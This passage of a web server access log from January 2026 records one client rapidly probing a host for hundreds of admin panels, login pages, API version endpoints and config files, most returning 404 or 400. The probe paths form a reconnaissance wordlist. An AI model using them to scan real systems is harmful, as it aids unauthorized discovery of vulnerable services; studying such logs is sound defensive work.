Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/Main_Login.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin/reports/updates" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/App_Themes/Default/Images/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/css/eonweb.css" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webportal.cgi" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/workplace/home.action" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/build.gradle" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nidp/app/login" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.cfm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/kubepi/fav.png" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/centreon/api/latest/platform/versions" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/pandora_console/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/about" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/css/elfinder.min.css" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rs/application-about" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/authLogin.cgi" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2/hoverfly/version" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ui/login.action" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/core/auth/login/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main/main.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/web/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/public/static/favicon.png" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/system/version/current" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/am_bin/amlogin" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/info" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/version" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin/config.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/images/logo.gif" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v3/meta" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/status" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/~login" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/hx/api/about" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/i18n/component/JS" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mailinspector/login.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/agc/vicidial.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/config_dump" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/app/ui/login.jsp" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/AppsHome.do" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/MagicInfo/config.js" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/plugin/webs_model_cfg.js" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login/?next=/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/agent/vicidial.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.do" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/system/gwinfo" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/luci" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/Main_Login.asp" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/jtcgi/wte.pyc" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/openapi.json" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/decisioncenter-api/v1/about" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/json/login_session" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nifi-api/flow/about" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nifi/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.lua" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/rs/application-about" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nidp/app/login" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/about" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sys/en/neoclassic/login/login" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/meteobridge.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api-description" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/v2" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/main/main.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/info.htm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/metrics" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/management/v1/cluster/state" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ui/login.action" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/post-smtp/readme.txt" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/monitor/index.php/auth/login" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sap/bc/ui2/flp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ignite?cmd=version" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/browser/index.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2.0/systeminfo" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2/hoverfly/version" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/core/auth/login/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/status" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/info" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin/config.php" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/mailinspector/login.php" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/getagent.cgi?type=s" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nmc/rss/server" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/cluster/summary" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ScadaBR/login.htm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/assets/img/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/config_dump" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/~login" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webpages/login.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/agc/vicidial.php" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/download/python/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/system/status" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/agent/vicidial.php" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sms_mp/.sms_aut?mplist" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rest/settings" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.do" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/AppsHome.do" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 